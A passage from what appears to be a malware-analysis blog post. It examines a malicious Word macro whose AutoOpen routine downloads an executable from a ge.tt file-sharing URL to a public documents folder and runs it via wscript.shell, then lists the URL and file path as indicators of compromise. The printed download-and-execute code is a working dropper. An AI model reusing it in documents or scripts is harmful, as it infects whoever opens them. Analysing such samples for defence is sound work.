S_var14 = ProudtoBecomeaNepaliReverseEngineer(0,"http://ge.tt/api/1/files/2gmBurF2/0/blob?download","C:\Users\Public\Documents\SbieCtrl.exe", 0, 0)
If Dir(S_var12) <> "" Then
Dim O_var1 As Object
Set O_var1 = CreateObject("wscript.shell")
Set O_var1 = O_var1.exec("C:\Users\Public\Documents\SbieCtrl.exe")
End If
End Sub
Code analysis summary:
AutoOpen() will be executed after the document is opened.
ProudtoBecomeNepaliReverseEngineer is just an alias to URLDownloadToFile()
URLDownloadToFile() accepts five parameters, including URL address
http://ge.tt/api/1/files/2gmBurF2/0/blob?download and a file name C:\Users\Public\Documents\SbieCtrl.exe.
Both information serve as a network and host indicators that might be used to check for successful compromise.
No comments:
Post a Comment